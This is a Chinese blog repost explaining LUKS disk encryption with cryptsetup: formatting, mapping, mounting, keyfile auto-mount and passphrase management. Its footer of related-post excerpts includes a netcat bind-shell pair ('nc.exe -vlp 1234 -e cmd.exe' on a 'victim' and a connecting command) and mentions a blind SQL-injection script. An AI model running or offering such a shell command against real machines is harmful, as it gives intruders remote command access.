LUKS(Linux Unified Key Setup)为Linux硬盘分区加密提供了一种标准,它不仅能通用于不同的Linux发行版本,还支持多用户/口令。因为它的加密密钥独立于口令,所以如果口令失密,我们可以迅速改变口令而无需重新加密真个硬盘。通过提供一个标准的磁盘上的格式,它不仅方便之间分布的兼容性,而且还提供了多个用户密码的安全管理。必须首先对加密的卷进行解密,才能挂载其中的文件系统。

工具:cryptsetup(默认已经安装)

常用参数:luksFormat、luksOpen、luksClose、luksAddKey

使用cryptsetup对分区进行了加密后,这个分区就不再允许直接挂载。LUKS也是一种基于device mapper 机制的加密方案。如果要使用这个分区,必须对这个分区做一个映射,映射到/dev/mapper这个目录里去,我们只能挂载这个映射才能使用。然而做映射的时候是需要输入解密密码的。

注:要解除加密需要备份分区内的文件再重新格式化LUKS分区

Crypsetup工具加密的特点:

Ø加密后不能直接挂载

Ø加密后硬盘丢失也不用担心数据被盗

Ø加密后必须做映射才能挂载

 
  1. 格式化LUKS分区 
  2. [root@rhel6 ~]# cryptsetup luksFormat /dev/vda8                     //将分区进行LUKS格式(变成LUKS分区)
  3. WARNING!
  4. ========
  5. This will overwrite data on /dev/vda8 irrevocably.
  6. Are you sure? (Type uppercase yes): YES                      //输入大写的YES
  7. Enter LUKS passphrase:                                   //输入两次密码
  8. Verify passphrase:
  9. 映射分区 
  10. [root@rhel6 ~]# cryptsetup luksOpen /dev/vda8 luks_test             //打开LUKS分区,将在/dev/mapper/目录中生成一个luks_test的文件
  11. Enter passphrase for /dev/vda8:                                   //必须输入luks密码才能打开LUKS分区
  12. 格式化、挂载、使用分区 
  13. [root@rhel6 ~]# mkfs.ext4 /dev/mapper/luks_test
  14. [root@rhel6 ~]# mount /dev/mapper/luks_test /luks/
  15. 关闭映射,先卸载后关闭 
  16. [root@rhel6 ~]# umount /luks/
  17. [root@rhel6 ~]# cryptsetup luksClose luks_test                      //关闭LUKS分区
  18. [root@rhel6 ~]# mount /dev/vda8 /luks/                           //无法直接挂载/dev/vda8分区
  19. mount: unknown filesystem type 'crypto_LUKS'
  20. 实现开机自动挂载LUKS分区: 
  21. [root@rhel6 ~]# dd if=/dev/urandom of=keyfile bs=1k count=4
  22. 4+0 records in
  23. 4+0 records out
  24. 4096 bytes (4.1 kB) copied, 0.00206882 s, 2.0 MB/s
  25. [root@rhel6 ~]# cryptsetup luksAddKey /dev/vda8 keyfile
  26. Enter any passphrase:
  27. [root@rhel6 ~]# vi /etc/crypttab
  28. name    /dev/vda8       /root/keyfile   luks
  29. [root@rhel6 ~]# vi /etc/fstab
  30. /dev/mapper/name        /luks                   ext4    _netdev         0 0
  31. 添加/移除/修改LUKS密码 
  32. [root@rhel6 ~]# cryptsetup luksAddKey /dev/vda8
  33. Enter any passphrase:
  34. Enter new passphrase for key slot:
  35. Verify passphrase:
  36. [root@rhel6 ~]# cryptsetup luksRemoveKey /dev/vda8
  37. Enter LUKS passphrase to be deleted:
  38. [root@rhel6 ~]# cryptsetup luksAddKey /dev/vda8 keyfile
  39. Enter any passphrase:

这里只是移除密码,并不是取消加密,如果想把磁盘取消加密的话,只能重新格式化,重新分区,否则是无法挂在的

这里是我删除了key之后的,想再次映射,结果就报错了

[root@testCentOS6 mapper]# cryptsetup luksOpen /dev/sdb  ceshi_2
Enter passphrase for /dev/sdb: 
No key available with this passphrase.
Enter passphrase for /dev/sdb:

转自:http://blog.51cto.com/vnimos/1175883

【Linux】使用cryptsetup加密磁盘 策略为LUKS的更多相关文章

  1. 用luks方式对磁盘进行加密以及加密磁盘的自动挂载

    1.关于luks加密 LUKS(Linux Unified Key Setup)为Linux硬盘分区加密提供了一种标准,它不仅能通用于不同的 Linux发行版本,还支持多用户/口令.因为它的加密密钥独 ...

  2. dm-crypt加密磁盘

    dm-cry加密方式密码与文件 与其它创建加密文件系统的方法相比,dm-crypt系统有着无可比拟的优越性:它的速度更快,易用性更强.除此之外,它的适用面也很广,能够运行在各种块设备上,即使这些设备使 ...

  3. Linux Shell之监测磁盘空间

    Linux Shell之监测磁盘空间 系统管理员的另一个重要任务就是监测系统磁盘的使用情况.不管运行的是简单Linux台式机还是大型的Linux服务器,我们都要知道还有多少空间可以留给应用程序.事实上 ...

  4. kvm上的Linux虚拟机使用virtio磁盘

    kvm上的Linux虚拟机使用virtio磁盘 系统:centos6.6  64位 网上的文章比较少,怎麽将Linux虚拟机的磁盘改为使用virtio磁盘 因为centos6或以上系统已经包含了vir ...

  5. Linux学习之路—磁盘分区

    1.各硬件设备在Linux中的文件名 在Linux系统中,每个设备都被当做一个文件来对待,同时在Linux系统中,几乎所有的硬件设备文件都在/dev这个目录中. 设备 设备在Linux内的文件名 ID ...

  6. Linux基础1之磁盘与分区

    Linux上面设备皆文件,目前需要知道的,比如U盘和SARA硬盘的在Linux上面的文件名,/dev/sd[a-p].与IDE接口不同的是,SATA/USB接口的磁盘没有一定的顺序,这里就根据Linu ...

  7. linux使用FIO测试磁盘的iops 【转载】

     linux使用FIO测试磁盘的iops 2013-09-23 10:59:21 分类: LINUX FIO是测试IOPS的非常好的工具,用来对硬件进行压力测试和验证,支持13种不同的I/O引擎,包括 ...

  8. linux性能优化cpu 磁盘IO MEM

    系统优化是一项复杂.繁琐.长期的工作,优化前需要监测.采集.测试.评估,优化后也需要测试.采集.评估.监测,而且是一个长期和持续的过程,不 是说现在优化了,测试了,以后就可以一劳永逸了,也不是说书本上 ...

  9. Linux系统格式化新磁盘并挂载分区

    Linux系统格式化新磁盘并挂载分区 在虚拟机的设置界面中,我们可以选择添加硬盘 添加好硬盘后,我们输入命令fdisk -l 看到有一个未经分区的硬盘 Fdisk命令编辑这个硬盘 输入n创建分区,p选 ...

随机推荐

  1. centos7 安装netstat命令工具

    [root@node01 yum.repos.d]# yum install -y net-tools Loaded plugins: fastestmirror Loading mirror spe ...

  2. 安卓和ios的app证书过期的相关问题汇总

    一,ios的APP的发布流程请见:ios的APP的发布流程 http://www.jianshu.com/p/b1b77d804254 这篇文章写得很好很全面 二,app证书过期了怎么办: IOS的情 ...

  3. Greenplum 性能优化之路 --(一)分区表

    一.什么是分区表 分区表就是将一个大表在物理上分割成若干小表,并且整个过程对用户是透明的,也就是用户的所有操作仍然是作用在大表上,不需要关心数据实际上落在哪张小表里面.Greenplum 中分区表的原 ...

  4. nc监控实现调用受害者cmd

    正向连接 受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网 受害者:nc.exe -vlp 1234 -e cmd.exe 攻击者 nc 192.168.1.1 1234 nc -lvvp 8 ...

  5. sqli-labs第5关布尔盲注pyhton脚本

    import requests import os #此函数先判断数据库长度 def length(url,str): num = 1 while True: str_num = '%d' %num ...

  6. 基于LNMP架构搭建wordpress博客之安装架构说明

    架构情况 架构情况:基于LNMP架构搭建wordpress系统 软件包版本说明: 系统要求 :  CentOS-6.9-x86_64-bin-DVD1.iso PHP版本  :  php-7.2.29 ...

  7. springcloud执行流程理解图

    执行流程图

  8. Springboot 源码解析-自定装配

    面试官经常会问你知道springboot的自定装配吗?它是怎么实现的吗?今天我们就来通过源码一起分析下它吧.首先我们先搭建一个springboot的简单项目,找到启动类, 然后通过这个注解我们进入到@ ...

  9. 回车禁止form提交表单

    今天遇到回车自动提交表单特此记录下 document.getElementsByTagName('form')[0].onkeydown = function(e) { var e = e || ev ...

  10. webpack相关的问题

    随着现代前端开发的复杂度和规模越来越庞大,已经不能抛开工程化来独立开发了,如react的jsx代码必须编译后才能在浏览器中使用:又如sass和less的代码浏览器也是不支持的. 而如果摒弃了这些开发框 ...